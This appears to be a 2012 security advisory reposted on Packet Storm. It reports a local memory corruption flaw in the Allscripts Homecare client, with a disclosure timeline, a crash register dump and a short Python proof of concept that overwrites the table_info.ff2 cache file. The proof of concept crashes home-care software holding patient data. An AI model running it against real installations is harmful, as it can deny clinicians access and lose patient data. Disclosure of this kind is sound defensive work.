Allscripts Homecare client versions 6.1.0 and 7.0.1 suffer from a local memory corruption vulnerability.
e61dd63f1038ddb7e663470bfe50f0750075133ada0a3baaf17a8d05dad3e126# Title: Allscripts Homecare Client Local Memory Corruption table_info.ff2
# Date: 10/25/12
# Author: G13
# Software Link:
http://www.allscripts.com/en/solutions/post-acute-solutions/homecare/show/overview.html
# Version: 6.1.0, 7.0.1
# Category: Application (local)
# Tested on: Windows 7 Pro 64 Bit
# dc585
###### Introduction ######
Allscripts Homecare is an industry leading home care system designed
to improve clinical quality of care, financial
performance, and operational control for large, integrated home care
organizations and small home care companies.
Business, clinical, and scheduling functionality for multiple lines of
business—home health, hospice, and private
duty are combined seamlessly in one integrated home care software system.
###### Report Timeline ######
12/22/11 - Discovery
01/12/12 - Vendor Notification
10/25/12 - Disclosure
###### Exploit Technique ######
Local
###### Details ######
A Memory Corruption vulnerability was detected in Allscripts Homecare
6.1.0. The vulnerability is caused by
processing a corrupt .ff2 file in the program's cache and causing an
access violation. The specific file is
table_info.ff2. The cache for this program is where a local copy of
paitent and system data is stored and
accessable by users. Corrupting this will deny users access to the
program and a possible loss of data.
Other versions are possibly affected.
###### Exception Log ######
EAX 00000000
ECX 00184646
EDX 41414141
EBX 006E994F MHC.006E994F
ESP 0018F244
EBP 0018F284
ESI 006E994F MHC.006E994F
EDI 00000000
EIP 004040AF MHC.004040AF
C 0 ES 002B 32bit 0(FFFFFFFF)
P 1 CS 0023 32bit 0(FFFFFFFF)
A 0 SS 002B 32bit 0(FFFFFFFF)
Z 0 DS 002B 32bit 0(FFFFFFFF)
S 0 FS 0053 32bit FFFDD000(FFF)
T 0 GS 002B 32bit 0(FFFFFFFF)
D 0
O 0 LastErr ERROR_COMMITMENT_LIMIT (000005AF)
EFL 00010206 (NO,NB,NE,A,NS,PE,GE,G)
ST0 empty 0.0
ST1 empty 0.0
ST2 empty 0.0
ST3 empty %#.19L
ST4 empty 0.0
ST5 empty 0.0
ST6 empty 0.0
ST7 empty %#.19L
3 2 1 0 E S P U O Z D I
FST 1020 Cond 0 0 0 0 Err 0 0 1 0 0 0 0 0 (GT)
FCW 137F Prec NEAR,64 Mask 1 1 1 1 1 1
###### PoC ######
#!/usr/bin/python
f = open('c:\program files
(x86)\misys\homecare\client\cache\table_info.ff2','w')
f.write('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA')
f.close()
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed